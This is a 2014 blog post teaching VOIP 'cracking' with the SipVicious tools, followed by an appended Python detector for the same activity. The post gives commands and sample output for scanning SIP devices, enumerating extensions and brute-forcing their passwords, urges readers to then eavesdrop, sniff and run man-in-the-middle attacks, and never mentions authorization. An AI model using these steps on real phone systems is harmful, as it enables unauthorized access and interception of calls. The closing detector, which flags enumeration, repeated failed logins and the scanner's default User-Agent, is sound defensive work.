Thursday, 3 April 2014

********VOIP Cracking*********



Author ~ Akhil Manikanth.
So, I know that most people at least know what Skype is and how it is used. To understand how Skype transfers information over the network, you need to learn a bit about packet transport.

I did post an article about the basics of the internet.

VOIP isn't the only protocol used for the purpose; there are a few more. For a secure protocol, ZRTP is used.

For successful VOIP hacking, there are steps to follow to understand how the exploit needs to be carried out. These steps include footprinting, scanning, enumeration, etc.

The attack can be done in many ways, like eavesdropping, phishing, packet decoding, etc.

VOIP hacking is made a lot easier mainly by router misconfigurations.

There is a set of Python tools called SipVicious >> http://code.google.com/p/sipvicious/downloads/detail?name=sipvicious-0.2.8.zip&can=2&q


For footprinting, use Google or SamSpade >> https://5star-shareware-downloads.s3.amazonaws.com/Internet/spade114.exe?Expires=1393095748&AWSAccessKeyId=AKIAIM5YQPKBL3AQ5PKQ&Signature=olVN7x0iDfvnj85b86lTsztVsCw%3D
Now comes the good part: how it is done.
Download SipVicious and get all the weapons ready. We are going for a battle!! Arm the VPN, look for a vulnerability in the network!! Now follow me.
SipVicious is a set of tools written in Python that can be used on different operating systems. To better understand the way it works, I'll take an example:
- Run svmap to look for SIP phones:

box $ ./svmap.py 192.168.1.1/24
| SIP Device         | User Agent |
-----------------------------------
| 192.168.1.111:5868 | New        |
| 192.168.1.112:5060 | unknown    |

Here we can see that a New server was detected on 192.168.1.111.

- Run svwar with default options on the target New; these accounts can be used for calling:

box $ ./svwar.py 192.168.1.111
| Extension | Authentication |
------------------------------
| 202       | reqauth        |
| 203       | reqauth        |
| 200       | reqauth        |
| 201       | noauth         |

Four extensions were found, 200 through 203; 201 does not require authorization while the rest do.

- Use svcrack with the optimization enabled to help you discover number-based passwords, as it just tries three-digit number combinations in order until it finds the password.

box $ ./svcrack.py 192.168.1.111 -u 201
| Extension | Password |
------------------------
| 201       | 201      |

The password for extension 201 is 201. To see how the attack works we can use -vv as follows: svcrack.py 192.168.1.111 -u 201 -vv and the screen will display what combination it is trying.

- The cracker can also use a dictionary file full of possible passwords.

box $ ./svcrack.py 192.168.1.111 -u 203 -d dictionary.txt
| Extension | Password |
------------------------
| 203       | ascript  |
You have successfully cracked the VOIP packet transfer, and now you can listen to the transfer because you know the password to access the network.
You can also sniff the network to get the data. This is also called eavesdropping.
This is done with the cracking. You guys must also know about MITM; the good news is that MITM is possible here too.
You had better fuzz the network before an attack to make sure that your attack would be foolproof.
Thought this would be enough for cracking the VOIP protocol. Just so you know, it is a vast topic that has a hundred more ways of approach.
If there is anything I forgot, please get me through it. Hope you guys like this.
~ Akhil Manikanth
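
Seen from the SIP server, the svwar and svcrack runs shown above have a clear shape: one source touching many extensions in a short time, then a stream of failed authentications against a single extension. The detector below is an added example, not part of the original post or of SipVicious. The log format, thresholds and sample lines are constructed assumptions; the "friendly-scanner" User-Agent is the SipVicious default and is easily changed, so it is only a supporting signal.

```python
import re
from collections import Counter, defaultdict

# Constructed log format (an assumption, not any real PBX's output):
#   <epoch> src=<ip> method=<SIP method> ext=<extension> status=<code> ua="<User-Agent>"
LINE = re.compile(r'(\d+) src=(\S+) method=(\S+) ext=(\S+) status=(\d{3}) ua="([^"]*)"')

WINDOW = 60       # seconds of traffic considered together
ENUM_EXTS = 4     # distinct extensions probed by one source (svwar-style sweep)
BRUTE_FAILS = 5   # 401/403 answers for one extension (svcrack-style guessing)
SCANNER_UA = "friendly-scanner"  # SipVicious default User-Agent; trivially changed

def sample_log():
    """Constructed traffic: one scanning source and one ordinary phone."""
    rec = '{} src={} method=REGISTER ext={} status={} ua="{}"'
    lines = [rec.format(1000 + i, "192.168.1.50", ext, 401, SCANNER_UA)
             for i, ext in enumerate((200, 201, 202, 203))]
    lines += [rec.format(1010 + i, "192.168.1.50", 203, 401, SCANNER_UA)
              for i in range(6)]
    # A normal registration: one 401 challenge, then 200 with credentials.
    lines.append(rec.format(1020, "192.168.1.20", 200, 401, "deskphone"))
    lines.append(rec.format(1021, "192.168.1.20", 200, 200, "deskphone"))
    return lines

def detect(lines):
    """Return sorted (source, finding) pairs for enumeration and guessing."""
    events = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m:  # unparseable lines are skipped, not fatal
            ts, src, _method, ext, status, ua = m.groups()
            events[src].append((int(ts), ext, status, ua))
    alerts = set()
    for src, evs in events.items():
        evs.sort()
        if any(SCANNER_UA in ua for _, _, _, ua in evs):
            alerts.add((src, "scanner-user-agent"))
        for start, *_ in evs:  # slide a window forward from each event
            win = [e for e in evs if 0 <= e[0] - start <= WINDOW]
            if len({ext for _, ext, _, _ in win}) >= ENUM_EXTS:
                alerts.add((src, "extension-enumeration"))
            fails = Counter(ext for _, ext, st, _ in win if st in ("401", "403"))
            if fails and max(fails.values()) >= BRUTE_FAILS:
                alerts.add((src, "password-guessing"))
    return sorted(alerts)

if __name__ == "__main__":
    for src, finding in detect(sample_log()):
        print(src, finding)
```

The ordinary phone at 192.168.1.20 raises nothing because a single 401 challenge followed by a 200 is the normal digest registration flow; the thresholds should be tuned to the site's own retry behaviour.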